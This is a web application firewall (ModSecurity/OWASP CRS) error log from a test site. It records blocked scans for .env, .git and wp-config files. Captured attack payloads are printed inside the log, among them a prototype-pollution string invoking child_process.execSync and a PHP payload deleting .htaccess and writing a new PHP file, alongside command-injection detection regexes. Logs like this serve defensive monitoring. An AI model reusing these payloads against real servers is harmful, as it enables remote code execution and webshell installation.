[Tue Mar 10 21:32:01.330520 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abB_weuxcVHUxuYGKFewsQAAAAM"]
[Tue Mar 10 21:32:01.351633 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abB_weuxcVHUxuYGKFewsgAAAAM"]
[Tue Mar 10 21:32:01.351812 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abB_weuxcVHUxuYGKFewsgAAAAM"]
[Tue Mar 10 21:32:01.351948 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abB_weuxcVHUxuYGKFewsgAAAAM"]
[Tue Mar 10 21:32:01.372753 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abB_weuxcVHUxuYGKFewswAAAAM"]
[Tue Mar 10 21:32:01.372919 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abB_weuxcVHUxuYGKFewswAAAAM"]
[Tue Mar 10 21:32:01.373059 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abB_weuxcVHUxuYGKFewswAAAAM"]
[Tue Mar 10 21:32:01.395137 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewtAAAAAM"]
[Tue Mar 10 21:32:01.395306 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewtAAAAAM"]
[Tue Mar 10 21:32:01.395430 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewtAAAAAM"]
[Tue Mar 10 21:32:01.417995 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abB_weuxcVHUxuYGKFewtQAAAAM"]
[Tue Mar 10 21:32:01.418140 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abB_weuxcVHUxuYGKFewtQAAAAM"]
[Tue Mar 10 21:32:01.418255 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abB_weuxcVHUxuYGKFewtQAAAAM"]
[Tue Mar 10 21:32:01.439056 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abB_weuxcVHUxuYGKFewtgAAAAM"]
[Tue Mar 10 21:32:01.439155 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abB_weuxcVHUxuYGKFewtgAAAAM"]
[Tue Mar 10 21:32:01.439293 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abB_weuxcVHUxuYGKFewtgAAAAM"]
[Tue Mar 10 21:32:01.439416 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abB_weuxcVHUxuYGKFewtgAAAAM"]
[Tue Mar 10 21:32:01.481808 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "abB_weuxcVHUxuYGKFewuAAAAAM"]
[Tue Mar 10 21:32:01.482033 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "abB_weuxcVHUxuYGKFewuAAAAAM"]
[Tue Mar 10 21:32:01.482151 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "abB_weuxcVHUxuYGKFewuAAAAAM"]
[Tue Mar 10 21:32:01.570112 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abB_weuxcVHUxuYGKFewvAAAAAM"]
[Tue Mar 10 21:32:01.570272 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abB_weuxcVHUxuYGKFewvAAAAAM"]
[Tue Mar 10 21:32:01.570422 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abB_weuxcVHUxuYGKFewvAAAAAM"]
[Tue Mar 10 21:32:01.593644 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewvQAAAAM"]
[Tue Mar 10 21:32:01.593784 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewvQAAAAM"]
[Tue Mar 10 21:32:01.593893 2026] [:error] [pid 2596671] [client 93.123.109.214:54548] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abB_weuxcVHUxuYGKFewvQAAAAM"]
[Tue Mar 10 23:46:02.531553 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5AAAAAE"]
[Tue Mar 10 23:46:02.531657 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5AAAAAE"]
[Tue Mar 10 23:46:02.531730 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) {timeout:5000}).tostring().trim() throw object.assign(new error(next_redirect) {digest:`${res}`}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5AAAAAE"]
[Tue Mar 10 23:46:02.532492 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5AAAAAE"]
[Tue Mar 10 23:46:02.532621 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5AAAAAE"]
[Tue Mar 10 23:46:02.791914 2026] [:error] [pid 2596669] [client 188.166.228.236:55964] [client 188.166.228.236] ModSecurity: Warning. Found 374 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "482"] [id "920270"] [msg "Invalid character in request (null character)"] [data "ARGS:0={\\x00\\x22\\x00t\\x00h\\x00e\\x00n\\x00\\x22\\x00:\\x00\\x22\\x00$\\x001\\x00:\\x00_\\x00_\\x00p\\x00r\\x00o\\x00t\\x00o\\x00_\\x00_\\x00:\\x00t\\x00h\\x00e\\x00n\\x00\\x22\\x00,\\x00\\x22\\x00s\\x00t\\x00a\\x00t\\x00u\\x00s\\x00\\x22\\x00:\\x00\\x22\\x00r\\x00e\\x00s\\x00o\\x00l\\x00v\\x00e\\x00d\\x00_\\x00m\\x00o\\x00d\\x00e\\x00l\\x00\\x22\\x00,\\x00\\x22\\x00r\\x00e\\x00a\\x00s\\x00o\\x00n\\x00\\x22\\x00:\\x00-\\x001\\x00,\\x00\\x22\\x00v\\x00a\\x00l\\x00u\\x00e\\x00\\x22\\x00:\\x00\\x22\\x00{\\x00\\x5c\\x00\\x22\\x00t\\x00h\\x00e\\x00n\\x00\\x5c\\x00\\x22\\x00:\\x00\\x5c\\x00\\x22\\x00$\\x00B\\x00..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "abCfKjVkqhup3a4IqeXV5QAAAAE"]
[Wed Mar 11 19:55:08.866108 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Rule 7fdc93258be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.phar"] [unique_id "abG6jFoSOHKOrUx98OiHwgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:08.866548 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 